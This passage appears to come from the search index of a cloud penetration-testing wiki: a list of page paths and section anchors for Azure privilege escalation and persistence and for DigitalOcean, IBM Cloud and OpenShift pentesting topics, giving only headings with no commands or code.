on/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#locations-countries-ip-ranges---device-condition","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#cloud-apps","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#other-az-mfa-bypasses","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#ring-tone","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#compliant-devices","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#tooling","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#azureappssweep","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#roadrecon","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#invoke-mfasweep","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#ropci","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#donkeytoken","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#references","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#az---dynamic-groups-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#basic-information","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#example","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.html#references","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#az---functions-app-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#function-apps","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#bucket-readwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostlistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesfunctionslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostfunctionkeyswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostmasterkeywrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostsystemkeyswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfiglistaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfiglistaction-microsoftwebsitesconfigwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostruntimevfswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitespublishxmlaction-microsoftwebsitesbasicpublishingcredentialspolicieswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteshostruntimevfsread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesfunctionstokenaction","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesfunctionspropertiesread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesconfiglistaction-microsoftwebsitesread-microsoftwebsitesconfiglistaction-microsoftwebsitesconfigread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#microsoftwebsiteswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftappmanagedenvironmentsjoinaction-microsoftwebsitesread-microsoftwebsitesoperationresultsread","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#remote-debugging","pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.html#change-github-repo","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#az---key-vault-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#azure-key-vault","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#microsoftkeyvaultvaultswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.html#modify-network-restrictions","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#az---logic-apps-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#logic-apps-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftresourcessubscriptionsresourcegroupsread-microsoftlogicworkflowsread-microsoftlogicworkflowswrite--microsoftmanagedidentityuserassignedidentitiesassignaction--microsoftlogicworkflowstriggersrunaction","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftlogicworkflowswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftlogicworkflowstriggerslistcallbackurlaction","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftlogicworkflowsread-microsoftlogicworkflowswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.html#microsoftwebsitesread-microsoftwebsitesbasicpublishingcredentialspoliciesread-microsoftwebsiteswrite-microsoftwebsitesconfiglistaction--microsoftwebsitesstartaction","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#az---mysql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#mysql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#microsoftdbformysqlflexibleserversread--microsoftdbformysqlflexibleserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#microsoftdbformysqlflexibleserversread-microsoftdbformysqlflexibleserverswrite-microsoftdbformysqlflexibleserversbackupsread-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.html#microsoftdbformysqlflexibleserversread-microsoftdbformysqlflexibleserverswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftdbformysqlflexibleserversadministratorswrite--microsoftdbformysqlflexibleserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#az---postgresql-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#postgresql-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#microsoftdbforpostgresqlflexibleserversread--microsoftdbforpostgresqlflexibleserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#microsoftdbforpostgresqlflexibleserversread-microsoftdbforpostgresqlflexibleserverswrite-microsoftdbforpostgresqlflexibleserversbackupsread-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.html#microsoftdbforpostgresqlflexibleserversread-microsoftdbforpostgresqlflexibleserverswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftdbforpostgresqlflexibleserversadministratorswrite--microsoftdbforpostgresqlflexibleserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#az---queue-storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#queue","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesread","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesprocessaction","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesaddaction","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessageswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#action-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.html#references","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#az---service-bus-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#service-bus","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesauthorizationruleslistkeysaction-or-microsoftservicebusnamespacesauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesauthorizationruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesqueuestopicsauthorizationruleslistkeysaction-or-microsoftservicebusnamespacesqueuestopicsauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespacesqueuestopicsauthorizationruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#microsoftservicebusnamespaceswrite--microsoftservicebusnamespacesread-if-az-cli-is-used","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#send-messages-with-keys-microsoftservicebusnamespacesqueuestopicsauthorizationruleslistkeysaction-or-microsoftservicebusnamespacesqueuestopicsauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#receive-with-keys-microsoftservicebusnamespacesqueuestopicsauthorizationruleslistkeysaction-or-microsoftservicebusnamespacesqueuestopicsauthorizationrulesregeneratekeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#send-messages-dataactions-microsoftservicebusnamespacesmessagessendaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#recieve-messages-dataactions-microsoftservicebusnamespacesmessagesreceiveaction","pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.html#references","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#az---static-web-apps-post-exploitation","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#azure-static-web-apps","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitessnippetswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#read-configured-third-party-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#overwrite-file---overwrite-routes-html-js","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsiteslistsecretsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsiteswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitesresetapikeyaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#microsoftwebstaticsitescreateuserinvitationaction","pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.html#pull-requests","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#az---storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#storage-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsregeneratekeyaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#blobs-specific-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsblobservicescontainersimmutabilitypolicieswrite--microsoftstoragestorageaccountsblobservicescontainersimmutabilitypoliciesdelete","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#file-shares-specific-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicestakeownershipaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesmodifypermissionsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesactassuperuseraction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslocaluserswrite-microsoftstoragestorageaccountslocalusersread","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountslocalusersregeneratepasswordaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsrestoreblobrangesaction-microsoftstoragestorageaccountsblobservicescontainersread-microsoftstoragestorageaccountsread--microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#microsoftstoragestorageaccountsfileservicessharesrestoreaction--microsoftstoragestorageaccountsread","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#other-interesting-looking-permissions-todo","pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.html#references","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#az---sql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#sql-database-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversread--microsoftsqlserverswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversfirewallruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversipv6firewallruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversadministratorswrite--microsoftsqlserversadministratorsread","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversazureadonlyauthenticationswrite--microsoftsqlserversazureadonlyauthenticationsread","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#microsoftsqlserversdatabasesdatamaskingpolicieswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.html#remove-row-level-security","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.html#az---virtual-desktop-privesx","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.html#azure-virtual-desktop-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.html#microsoftdesktopvirtualizationhostpoolsretrieveregistrationtokenaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.html#microsoftauthorizationroleassignmentsread-microsoftauthorizationroleassignmentswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#az---virtual-machines--network-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#vms--network","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesextensionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputediskswrite-microsoftnetworknetworkinterfacesjoinaction-microsoftcomputevirtualmachineswrite-microsoftcomputegalleriesapplicationswrite-microsoftcomputegalleriesapplicationsversionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesruncommandaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesloginaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachinesloginasadminaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftresourcesdeploymentswrite-microsoftnetworkvirtualnetworkswrite-microsoftnetworknetworksecuritygroupswrite-microsoftnetworknetworksecuritygroupsjoinaction-microsoftnetworkpublicipaddresseswrite-microsoftnetworkpublicipaddressesjoinaction-microsoftnetworknetworkinterfaceswrite-microsoftcomputevirtualmachineswrite-microsoftnetworkvirtualnetworkssubnetsjoinaction-microsoftnetworknetworkinterfacesjoinaction-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#microsoftcomputevirtualmachineswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.html#todo-microsoftcomputevirtualmachineswacloginasadminaction","pentesting-cloud/azure-security/az-persistence/index.html#az---persistence","pentesting-cloud/azure-security/az-persistence/index.html#oauth-application","pentesting-cloud/azure-security/az-persistence/index.html#applications-and-service-principals","pentesting-cloud/azure-security/az-persistence/index.html#federation---token-signing-certificate","pentesting-cloud/azure-security/az-persistence/index.html#federation---trusted-domain","pentesting-cloud/azure-security/az-persistence/index.html#references","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#az---automation-accounts-persistence","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#storage-privesc","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#backdoor-existing-runbook","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#malware-inside-a-vm-used-in-a-hybrid-worker-group","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#custom-environment-packages","pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.html#compromise-external-repos","pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.html#az---cloud-shell-persistence","pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.html#cloud-shell-persistence","pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.html#cloud-shell-phishing","pentesting-cloud/azure-security/az-persistence/az-logic-apps-persistence.html#az---logic-apps-persistence","pentesting-cloud/azure-security/az-persistence/az-logic-apps-persistence.html#logic-apps","pentesting-cloud/azure-security/az-persistence/az-logic-apps-persistence.html#common-persistence-techniques","pentesting-cloud/azure-security/az-persistence/az-sql-persistence.html#az---sql-persistence","pentesting-cloud/azure-security/az-persistence/az-sql-persistence.html#sql","pentesting-cloud/azure-security/az-persistence/az-sql-persistence.html#common-persistence-techniques","pentesting-cloud/azure-security/az-persistence/az-queue-persistence.html#az---queue-storage-persistence","pentesting-cloud/azure-security/az-persistence/az-queue-persistence.html#queue","pentesting-cloud/azure-security/az-persistence/az-queue-persistence.html#actions-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-persistence/az-queue-persistence.html#references","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#az---vms-persistence","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#vms-persistence","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#backdoor-vm-applications-vm-extensions--images","pentesting-cloud/azure-security/az-persistence/az-vms-persistence.html#backdoor-instances","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#az---storage-persistence","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#storage-privesc","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#common-tricks","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#microsoftstoragestorageaccountsblobservicescontainersupdate--microsoftstoragestorageaccountsblobservicesdeletepolicywrite","pentesting-cloud/azure-security/az-persistence/az-storage-persistence.html#microsoftstoragestorageaccountsread--microsoftstoragestorageaccountslistkeysaction","pentesting-cloud/azure-security/az-device-registration.html#az---device-registration","pentesting-cloud/azure-security/az-device-registration.html#basic-information","pentesting-cloud/azure-security/az-device-registration.html#tpm---trusted-platform-module","pentesting-cloud/azure-security/az-device-registration.html#registering-a-device-with-sso-tokens","pentesting-cloud/azure-security/az-device-registration.html#overwriting-a-device-ticket","pentesting-cloud/azure-security/az-device-registration.html#overwrite-whfb-key","pentesting-cloud/azure-security/az-device-registration.html#references","pentesting-cloud/digital-ocean-pentesting/index.html#digital-ocean-pentesting","pentesting-cloud/digital-ocean-pentesting/index.html#basic-information","pentesting-cloud/digital-ocean-pentesting/index.html#basic-enumeration","pentesting-cloud/digital-ocean-pentesting/index.html#ssrf","pentesting-cloud/digital-ocean-pentesting/index.html#projects","pentesting-cloud/digital-ocean-pentesting/index.html#whoami","pentesting-cloud/digital-ocean-pentesting/index.html#services-enumeration","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#do---basic-information","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#main-differences-from-aws","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#hierarchy","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#user","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#team","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#project","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#permissions","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#team-1","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#roles","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#access","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#username--password-mfa","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#api-keys","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#spaces-access-keys","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#oauth-application","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#ssh-keys","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#functions-authentication-token","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#logs","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#user-logs","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#team-logs","pentesting-cloud/digital-ocean-pentesting/do-basic-information.html#references","pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.html#do---permissions-for-a-pentest","pentesting-cloud/digital-ocean-pentesting/do-services/index.html#do---services","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#do---apps","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.html#rce--encrypted-env-vars","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#do---container-registry","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#connection","pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#do---databases","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#connections-details","pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#do---droplets","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#authentication","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#firewall","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.html#rce","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#do---functions","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#triggers","pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#do---images","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-images.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#do---kubernetes-doks","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#digitalocean-kubernetes-doks","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#connection","pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#do---networking","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#domains","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#reserverd-ips","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#load-balancers","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#vpc","pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.html#firewall","pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.html#do---projects","pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.html#do---spaces","pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.html#access","pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.html#enumeration","pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.html#do---volumes","pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.html#basic-information","pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.html#enumeration","pentesting-cloud/ibm-cloud-pentesting/index.html#ibm-cloud-pentesting","pentesting-cloud/ibm-cloud-pentesting/index.html#what-is-ibm-cloud-by-chatgpt","pentesting-cloud/ibm-cloud-pentesting/index.html#basic-information","pentesting-cloud/ibm-cloud-pentesting/index.html#ssrf","pentesting-cloud/ibm-cloud-pentesting/index.html#references","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.html#ibm---hyper-protect-crypto-services","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.html#basic-information","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.html#what-is-a-hardware-security-module","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.html#ibm---hyper-protect-virtual-server","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.html#basic-information","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.html#metadata--vpc","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.html#ibm-z-and-linuxone","pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.html#linuxone-vs-x64","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#ibm---basic-information","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#hierarchy","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#iam","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#users","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#trusted-profiles","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#service-ids","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#identity-providers","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#access-groups","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#roles","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#access-policies","pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.html#references","pentesting-cloud/openshift-pentesting/index.html#openshift-pentesting","pentesting-cloud/openshift-pentesting/index.html#basic-information","pentesting-cloud/openshift-pentesting/index.html#security-context-constraints","pentesting-cloud/openshift-pentesting/index.html#privilege-escalation","pentesting-cloud/openshift-pentesting/openshift-basic-information.html#openshift---basic-information","pentesting-cloud/openshift-pentesting/openshift-basic-information.html#kubernetes-prior-b-asic-knowledge","pentesting-cloud/openshift-pentesting/openshift-basic-information.html#openshift---basic-information-1","pentesting-cloud/openshift-pentesting/openshift-basic-information.html#introduction","pentesting-cloud/openshift-pentesting/openshift-basic-information.html#openshift---security-context-constraints","pentesting-cloud/openshift-pentesting/openshift-scc.html#openshift---scc","pentesting-cloud/openshift-pentesting/openshift-scc.html#definition","pentesting-cloud/openshift-pentesting/openshift-scc.html#list-scc","pentesting-cloud/openshift-pentesting/openshift-scc.html#use-scc","pentesting-cloud/openshift-pentesting/openshift-scc.html#scc-bypass","pentesting-cloud/openshift-pentesting/openshift-scc.html#references","pentesting-cloud/openshift-pentesting/openshift-jenkins/index.html#openshift---jenkins","pentesting-cloud/openshift-pentesting/openshift-jenkins/index.html#disclaimer","pentesting-cloud/openshift-pentesting/openshift-jenkins/index.html#prerequisites","pentesting-cloud/openshift-pentesting/openshift-jenkins/index.html#how-it-works","pentesting-cloud/openshift-pentesting/openshift-jenkins/index.html#builds","pentesting-cloud/openshift-pentesting/openshift-jenkins/index.html#triggering-a-build","pentesting-cloud/openshift-pentesting/openshift-jenkins/index.html#jenkins-build-pod-yaml-override","pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.html#jenkins-in-openshift---build-pod-overrides","pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.